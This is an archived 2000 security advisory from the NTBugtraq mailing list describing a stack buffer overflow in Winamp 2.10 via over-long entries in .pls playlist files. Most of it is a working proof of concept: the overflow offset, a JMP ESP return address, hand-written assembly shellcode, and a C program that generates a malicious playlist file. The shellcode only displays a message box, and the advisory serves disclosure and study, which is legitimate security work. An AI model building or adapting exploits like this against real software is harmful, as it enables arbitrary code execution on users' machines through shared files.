Archive : 2000 : january : winamp - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
Winamp buffer overflow advisory



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Вт, 04 янв 2000  19:14:59

   От: darkplan <darkplan@OCEANFREE.NET>

 Кому: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

 Тема: Winamp buffer overflow advisory

--------------------------------------------------------------------------------




Nullsoft Winamp 2.10 buffer overflow advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: Steve Fewer, darkplan@oceanfree.net

                     http://indigo.ie/~lmf

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Introduction:



I recently uncovered a stack based buffer overflow in winamp

version 2.10 which lets me execute 'arbitrary code'. It is 

carried out through .pls files which winamp uses for playlists. 

This is unnerving as it is a feasible plan to trade playlists on

irc during a mp3 trading session with someone.



The overflow occurs when an entry greater than 580 bytes is 

read in from a .pls file. The EIP is the only register overwritten 

in the next four bytes that follow, from there on is space for 

your shell code. eg.



[playlist]

File1=<580 bytes><eip><shell code>

NumberOfEntries=1  



The first 580 bytes get mangled around in memory but the 585 

byte (where our shell code starts) is pointed to by the ESP, 

therefore a simple 'JMP ESP' or the like will land us back in 

our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in 

comctl32.dll which winamp loads. Pointing our EIP into that 

address lands us back where we want to be. 



This was all created/tested on Windows 98 [Version 4.10.1998]

running on an Intel PII400 with 128MB RAM.





The Shell Code:



The shell code I wrote for this simply displays a message box 

and then calls exit(). However Winamp doesn't load msvcrt.dll 

which is needed to call exit() so we have to load it ourselves. 

I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for

LoadLibraryA(). For calling Messagebox I used the address 

0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I 

used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It 

didn't warrant using GetProcAddress for compatibilities sake.

For the OP codes see the exploit further on.



    // This loads msvcrt.dll

    push ebp

    mov ebp,esp

    xor eax,eax

    push eax

    push eax

    push eax

    mov byte ptr[ebp-0Ch],4Dh

    mov byte ptr[ebp-0Bh],53h

    mov byte ptr[ebp-0Ah],56h

    mov byte ptr[ebp-09h],43h

    mov byte ptr[ebp-08h],52h

    mov byte ptr[ebp-07h],54h

    mov byte ptr[ebp-06h],2Eh

    mov byte ptr[ebp-05h],44h

    mov byte ptr[ebp-04h],4Ch

    mov byte ptr[ebp-03h],4Ch

    mov edx,0xBFF776D4

    push edx

    lea eax,[ebp-0Ch]

    push eax

    call dword ptr[ebp-10h]

    // This calls MessageBox to say 'Hi!'

    push ebp

    mov ebp,esp

    xor edi,edi

    push edi

    mov byte ptr[ebp-04h],48h

    mov byte ptr[ebp-03h],69h

    mov byte ptr[ebp-02h],21h

    mov edx, 0xBFF5412E

    push edx

    push edi

    lea edx,[ebp-04h]

    push edx

    push edx

    push edi

    call dword ptr[ebp-08h]

    // This calls exit()

    push ebp

    mov ebp,esp

    mov edx,0xFFFFFFFF

    sub edx,0x87FFAAFB

    push edx

    xor eax,eax

    push eax

    call dword ptr[ebp-04h]



The Exploit:



<-snip->



/* Stack based buffer overflow exploit for Winamp v2.10

 * Author Steve Fewer, 04-01-2k. Mail me at darkplan@oceanfree.net

 *

 * For a detailed description on the exploit see my advisory.

 *

 * Tested with Winamp v2.10 using Windows98 on an Intel

 * PII 400 with 128MB RAM

 *

 * http://indigo.ie/~lmf

 */



#include <stdio.h>



int main()

{



    printf("\n\n\t\t.......................................\n");

    printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");

    printf("\t\t.......................................\n");

    printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");

    printf("\t\t.........http://indigo.ie/~lmf.........\n");

    printf("\t\t.......................................\n\n");



char buffer[640];

char eip[8] = "\xF7\xCF\xB9\xBF";

char sploit[256] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53

\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\

xC6

\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\

x50

\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\

x21

\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\

xFF

\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";



FILE *file;



    for(int x=0;x<580;x++)

    {

    buffer[x] = 0x90;

    }



file = fopen("crAsh.pls","wb");



fprintf(file, "[playlist]\n");

fprintf(file, "File1=");

fprintf(file, "%s", buffer);

fprintf(file, "%s", eip);

fprintf(file, "%s", sploit);

fprintf(file, "\nNumberOfEntries=1");



fclose(file);

printf("\t     created file crAsh.pls loaded with the exploit.\n");

return 0;

}



<-snip->





-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
test server